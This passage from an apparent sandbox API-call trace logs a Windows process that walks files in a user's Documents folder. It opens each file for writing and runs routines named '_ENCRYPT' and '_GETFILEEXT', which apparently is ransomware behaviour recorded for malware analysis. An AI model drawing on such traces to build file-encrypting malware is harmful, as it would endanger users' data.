out: hHeap=0x8a0000) returned 1 [0174.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0174.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0174.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0174.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0174.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0174.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0174.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0174.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0174.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0174.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0174.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0174.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0174.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0174.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0174.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0174.037] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0174.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0174.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0174.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0174.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0174.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0174.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0174.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0174.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0174.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0174.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0174.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0174.037] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0174.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0174.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0174.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0174.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0174.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0174.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0174.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0174.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0174.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0174.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0174.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0174.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0174.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0174.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0174.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0174.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0174.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0174.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0174.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0174.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0174.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0174.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0174.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0174.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0174.038] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0174.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0174.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0174.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0174.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0174.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0174.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0174.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0174.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0174.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0174.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0174.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0174.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0174.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0174.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0174.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0174.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0174.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0174.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0174.039] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0174.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0174.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0174.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0174.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd810 [0174.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd810, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0174.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0174.040] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0174.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0174.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0174.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0174.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0174.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0174.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0174.040] CloseHandle (hObject=0x138) returned 1 [0174.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0174.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0174.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0174.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0174.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0174.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0174.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0174.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0174.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0174.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0174.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0174.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0174.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0174.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0174.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0174.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0174.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0174.041] FreeLibrary (hLibModule=0x75990000) returned 1 [0174.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0174.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0174.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0174.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0174.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0174.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0174.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0174.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0174.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0174.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0174.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0174.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0174.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0174.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0174.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0174.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0174.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0174.042] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0174.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0174.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0174.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0174.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0174.043] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0174.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0174.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0174.043] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0174.043] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0174.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0174.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0174.043] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0174.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0174.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ni", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0174.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ini", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0174.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ini", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0174.043] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="desktop.ini", cAlternateFileName="")) returned 0x90add8 [0174.045] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0174.045] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="desktop.ini", cAlternateFileName="")) returned 0x90add8 [0174.046] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0174.046] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0174.046] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0174.046] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0174.047] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0174.049] FreeLibrary (hLibModule=0x75990000) returned 1 [0174.049] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0174.049] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0174.050] FreeLibrary (hLibModule=0x75990000) returned 1 [0174.050] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0174.050] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0174.050] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0174.050] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0174.050] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ss", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0174.050] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vss", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0174.050] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".vss", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0174.050] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9e9e4460, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9e9e4460, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Favorites.vss", cAlternateFileName="FAVORI~1.VSS")) returned 0x90add8 [0174.051] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0174.051] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9e9e4460, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9e9e4460, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Favorites.vss", cAlternateFileName="FAVORI~1.VSS")) returned 0x90add8 [0174.052] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0174.052] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0174.052] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0174.052] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0174.053] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0174.054] FreeLibrary (hLibModule=0x75990000) returned 1 [0174.054] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0174.054] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0174.055] FreeLibrary (hLibModule=0x75990000) returned 1 [0174.055] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0174.055] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0174.055] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0174.055] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0174.055] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="co", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0174.055] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ico", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0174.055] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ico", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0174.055] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="folder.ico", cAlternateFileName="")) returned 0x90add8 [0174.056] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0174.056] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="folder.ico", cAlternateFileName="")) returned 0x90add8 [0174.057] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0174.057] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0174.057] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0174.057] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0174.057] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0174.057] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0174.057] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0174.057] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0174.057] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0174.057] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0174.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0174.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0174.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0174.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0174.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS 